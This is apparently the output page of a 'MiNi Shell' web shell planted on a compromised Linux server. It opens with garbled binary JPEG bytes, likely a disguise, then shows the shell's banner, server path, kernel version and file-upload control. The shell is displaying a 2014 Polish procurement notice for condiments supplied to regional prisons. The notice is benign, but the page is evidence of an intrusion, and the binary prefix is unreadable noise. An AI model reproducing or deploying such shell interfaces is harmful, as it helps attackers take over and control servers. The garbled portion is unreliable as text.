JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140417/84653-N-2014.html

<p class="kh_header"><b>Gdańsk: III. Dostawy przypraw znak sprawy: 4/2014/BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 84653 - 2014; data zamieszczenia: 17.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> igbbaltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: IGB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> III. Dostawy przypraw znak sprawy: 4/2014/BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> GRUPA 1 :

1. Cukier biały w opakowaniu 1 kg, ilość szacunkowa 5000 opakowań. CPV: 15831200-4.
2. Cukier waniliowy w opakowaniu 30g-40g, ilość szacunkowa 600 opakowań. CPV:15831000-2.
3. Słodzik, 250-350 tabletek w opakowaniu - automat, tabletka o masie 50 mg - 60 mg, ilość szacunkowa 1000 opakowań. CPV: 15830000-5.
4. Słodzik, 1100-1300 tabletek w opakowaniu - automat, tabletka o masie 50 mg - 60 mg, ilość szacunkowa 2000 opakowań. CPV: 15830000-5.
 GRUPA 2 :
1.
1.   Sól biała warzona jodowana spożywcza w opakowaniu 1 kg, ilość szacunkowa 1000 opakowań. CPV: 15872400-5.
2.  Pieprz czarny mielony w opakowaniu 15 g - 20 g, ilość szacunkowa 2000 opakowań. CPV: 15872100-2.
3   .Pieprz czarny mielony w opakowaniu 1 kg, ilość szacunkowa 400 opakowań. CPV: 15872100-4.   4.  Papryka ostra mielona w opakowaniu 20 g - 30 g, ilość szacunkowa 900 opakowań. CPV: 15870000-7.
5. Papryka słodka mielona w opakowaniu 20 g - 30 g, ilość szacunkowa 1000 opakowań. CPV: 15870000-7.
6. Liść laurowy w opakowaniu 20 g - 30 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
7. Przyprawa Vegeta Podravka w opakowaniu 75 g, ilość szacunkowa 1200 opakowań. Skład m.in.: sól kuchenna, suszone warzywa-15,5% (w tym: marchew, pasternak, cebula, seler, natka pietruszki). CPV: 15870000-7.
8. Przyprawa do potraw Warzywko uniwersalne - smak świeżych warzyw w opakowaniu 75 g, ilość szacunkowa 600 opakowań. Skład m.in.: sól, warzywa suszone-15,1% (w tym: marchew, cebula, pasternak, liście selera, natka pietruszki, czosnek, papryka, pomidory). CPV: 15870000-7.
9. Przyprawa Delikat do mięs 200 g, ilość szacunkowa 600 opakowań CPV: 15870000-7.
10. Czosnek granulowany w opakowaniu 20 g - 30 g, ilość szacunkowa 880 opakowań. CPV: 15870000-7. 
11. Czosnek granulowany w opakowaniu 1 kg, ilość szacunkowa 400 opakowań. CPV:15870000-7.
12. Majeranek w opakowaniu 20 g - 30 g, ilość szacunkowa 340 opakowań. CPV: 15870000-7.
13. Majeranek w opakowaniu 1 kg, ilość szacunkowa 200 opakowań. CPV: 15870000-7.
14. Oregano w opakowaniu 10 g - 20 g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
15. Liście bazylii w opakowaniu 10 g - 20 g, ilość szacunkowa 800 opakowań. CPV: 15870000-7.
16. Cynamon mielony w opakowaniu 20 g - 30 g, ilość szacunkowa 300 opakowań. CPV: 15870000-7.
17. Koperek w opakowaniu 8 g - 15 g, ilość szacunkowa 800 opakowań. CPV: 15870000-7.
18. Susz z liści pietruszki w opakowaniu 10 g - 20 g, ilość szacunkowa 800 opakowań. CPV: 15870000-7.
19. Chili w opakowaniu 20 g - 30 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
20. Przyprawa do zup, sosów, sałatek w płynie Winiary 210 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
21. Przyprawa kucharek w opakowaniu 1 kg, ilość szacunkowa 200 opakowań. CPV: 15870000-7.
22. Kwasek cytrynowy do celów spożywczych w opakowaniu 20 g - 30 g, ilość szacunkowa 2550 opakowań. CPV: 15870000-7.
23. Soda oczyszczona do celów spożywczych w opakowaniu 75 g - 85 g, ilość szacunkowa 1000 opakowań. CPV: 15870000-7.
24. Zaprawa cytrynowa w opakowaniu 200 ml, ilość szacunkowa 600 opakowań.CPV:15870000-7.

25. Ziele angielskie w opakowaniu 20 g - 30 g, ilość szacunkowa 600 opakowań. CPV: 15870000-7.
26. Przyprawa do kebaba-gyros 30 g - 50 g, ilość szacunkowa 600 opakowań. CPV: 157870000-7.
27. Żelatyna spożywcza wieprzowa zwykła od 50 g - 80 g, ilość szacunkowa 600 opakowań. CPV: 15892400-1.
28. Barszczyk czerwony koncentrat w opakowaniu szklanym od 300 g - 330 g, ilość szacunkowa 600 opakowań. CPV: 15891400-4.
29. Ocet spirytusowy rektyfikowany 10%, ocet wyprodukowany z przedestylowanego alkoholu pochodzenia rolniczego, w opakowaniu szklanym 500 g, ilość szacunkowa 200 opakowań. CPV: 15871110-8.
30. Ocet winny 6 % w opakowaniu szklanym 0,5l, ilość szacunkowa 200 opakowań. CPV: 15871120-1. 
31. Sos sojowy w opakowaniu szklanym 150 ml, ilość szacunkowa 200 opakowań. CPV: 15871210-9. 
32. Żur w opakowaniu szklanym 0,5l, zakwas z mąki żytniej i pszennej poddany naturalnej fermentacji, ilość szacunkowa 600 opakowań. CPV: 15851000-8.
33. Kminek mielony 20 g - 30 g, ilość szacunkowa 300 opakowań, CPV:15872300-4.
34. Tymianek 20 g - 30 g, ilość szacunkowa 300 opakowań, CPV:15872300-4.
35. Cząber 20 g - 30 g, ilość szacunkowa 300 opakowań, CPV:15872300-4.
36. Pieprz ziołowy w opakowaniu od 20g-25 g ,ilość szacunkowa 300 opakowań, CPV:15872200-3
37. Przyprawa do kurczaka od 20 g - 30 g, ilość szacunkowa 500 opakowań, CPV:15871270-7.
38. Przyprawa do ryb od 20 g - 30 g, ilość szacunkowa 500 opakowań, CPV:15870000-7. 
39. Przyprawa meksykańska od 20 g - 30 g, ilość szacunkowa 500 opakowań, CPV:15871270-7.
40. Imbir w opakowaniu 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15872500-6.
41. Gałka muszkatołowa 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15870000-7.
42. Zioła prowansalskie 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15872300-4.
43. Curry w opakowaniu 20 g - 30 g, ilość szacunkowa 500 opakowań. CPV: 15870000-7.
44. Przyprawa do gulaszu od 20 g - 25 g, ilość szacunkowa 500 opakowań, CPV:15891500-5.
45. Przyprawa do ziemniaków od 20 g - 25 g, ilość szacunkowa 500 opakowań, CPV:15870000-7.
46. Kurkuma od 20 g - 25 g, ilość szacunkowa 500 opakowań, CPV:15870000-7.
47. Estragon  , od 20 g - 25 g ilość szacunkowa 500 opakowań, CPV:15872000-1.
GRUPA 3 :
1. Włocławek koncentrat pomidorowy 30% w opakowaniu 1 litr, ilość szacunkowa 600 opakowań. CPV: 15331427-6.
2. Włocławek ketchup łagodny w opakowaniu 1 litr, ilość szacunkowa 600 opakowań. CPV: 15871230-5.
3. Włocławek ketchup pikantny w opakowaniu 480 g, ilość szacunkowa 1100 opakowań. CPV: 15871230-5.
4. Ketchup pikantny Pudliszki w opakowaniu 480 g, ilość szacunkowa 1100 opakowań. Skład m.in.: pomidory 183 g na 100 g ketchupu. CPV: 15871230-5.
5. Ketchup pikantny w opakowaniu 400 g - 500 g, ilość szacunkowa 2600 opakowań. CPV: 15871230-5.
6. Ketchup Tortex w tubie plastikowej 500 g, ilość szacunkowa 2000 opakowań, CPV:15871230
7. Majonez pomorski stołowy Ocetix w opakowaniu 260 g, ilość szacunkowa 2500 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
8. Majonez pomorski stołowy Ocetix w opakowaniu 620 g, ilość szacunkowa 1000 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
9. Majonez dekoracyjny Winiary w opakowaniu 400 ml, ilość szacunkowa 1000 opakowań. Skład m.in.: olej roślinny, żółtko jaj-6%, ocet, musztarda, cukier, sól. Średnia zawartość odżywcza w 100 ml produktu: tłuszcz 76,1 g. CPV: 15871273-8.
10. Majonez w tubie 450 g - 550 g, ilość szacunkowa 1000 opakowań. Zawartość tłuszczu powyżej 63%. CPV: 15871273-8.
11. Musztarda stołowa w opakowaniu plastikowym 180 g - 220 g, ilość szacunkowa 1000 opakowań. CPV: 15871250-1.
12. Musztarda sarepska w opakowaniu plastikowym 450 g - 550 g, ilość szacunkowa 1800 opakowań. CPV: 15871250-1.
13. Musztarda sarepska Ocetix w opakowaniu 180 g - 220 g, ilość szacunkowa 1400 opakowań. CPV: 15871250-1.
14. Chrzan tarty w opakowaniu 170 g - 200 g, ilość szacunkowa 1000 opakowań. CPV: 15870000-7.
15. Chrzan łowicki naturalny Urbanek w opakowaniu 180 g, ilość szacunkowa 900 opakowań. CPV: 15870000-7.
Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
Dostarczane ww. artykuły nie mogą wykazywać oznak nieświeżości lub zepsucia. Mają być świeże, o dobrym smaku, z długim okresem przydatności do spożycia dla danego artykułu, w zamkniętych i nieuszkodzonych opakowaniach, które posiadają nadrukowaną informację o nazwie środka spożywczego (skład), nazwie i adresie producenta, dacie przydatności do spożycia oraz gramaturze lub litrażu, a także kod kreskowy.
Wykonawca dostarcza artykuły w opakowaniach, które nie są wykonane ze szkła oraz z metalu, za wyjątkiem: przyprawy do zup, sosów, sałatek (poz. 20,32/gr. 2/,), koncentratu pomidorowego (poz. 1/gr.3/), barszczyku czerwonego koncentrat (poz. 28 / gr.2/), octu (poz. 29, 30/gr.2/), chrzanu (poz.15/gr.15/ ),majonezu (poz. 7, 8, 9/gr. 3/),ketchup (poz. 2, 3/gr.3/).
Dopuszczalne są oferty równoważne, tzn. artykuły o innych nazwach handlowych niż określone przez zamawiającego, pod warunkiem, że będą posiadały parametry np. gramatura lub litraż taki sam jak opisany dany przedmiot zamówienia oraz będą posiadały inne parametry, w szczególności dotyczące smaku i aromatu nie gorsze niż artykuły opisane i wymienione przez zamawiającego. Na wykonawcy ciąży udowodnienie, że równoważny artykuł nie jest gorszy od określonego przez zamawiającego. W przypadku oferowania artykułów równoważnych wykonawca do oferty załącza wypełniony załącznik nr 5 do siwz, tj. formularz dotyczący porównania parametrów artykułów.
Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, w sposób zapobiegający utracie walorów smakowych i użytkowych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1 
b) Zakładu Karnego w Bydgoszczy-Fordon, ul. Rynek 8 
c) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4 
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27 
e) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4 
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17
h) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46
i) Aresztu Śledczego w Toruniu, ul. Piekary 53 
j) Zakładu Karnego we Włocławku, ul. Bartnicka 10 
2) Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew.
4) Realizacja dostaw do magazynu w uzgodnionych terminach, nie mniej niż 3 razy w tygodniu w godz. 8:00-12:00.
5) Termin płatności: 30 dni, forma płatności: przelew.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.12.00-4, 15.83.00.00-5, 15.87.24.00-5, 15.87.21.00-2, 15.87.00.00-7, 15.87.25.00-6, 15.33.14.27-6, 15.87.12.30-5, 15.87.12.73-8, 15.87.12.50-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i/lub pkt 2
2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1
3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy
4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego
5) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbbaltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA ODDZIAŁ POTULICE 
UL.ALEJA PARKOWA 1
89-120 POTULICE.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 12:00, miejsce: BIGB BALTICA ODDZIAŁ POTULICE 
UL.ALEJA PARKOWA 1
89-120 POTULICE
sekretariat ZK POTULICE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cukier biały w opakowaniu 1 kg, ilość szacunkowa 5000 opakowań. CPV: 15831200-4.
2. Cukier waniliowy w opakowaniu 30g-40g, ilość szacunkowa 600 opakowań. CPV:15831000-2.
3. Słodzik, 250-350 tabletek w opakowaniu - automat, tabletka o masie 50 mg - 60 mg, ilość szacunkowa 1000 opakowań. CPV: 15830000-5.
4. Słodzik, 1100-1300 tabletek w opakowaniu - automat, tabletka o masie 50 mg - 60 mg, ilość szacunkowa 2000 opakowań. CPV: 15830000-5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4, 15.83.10.00-2, 15.83.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
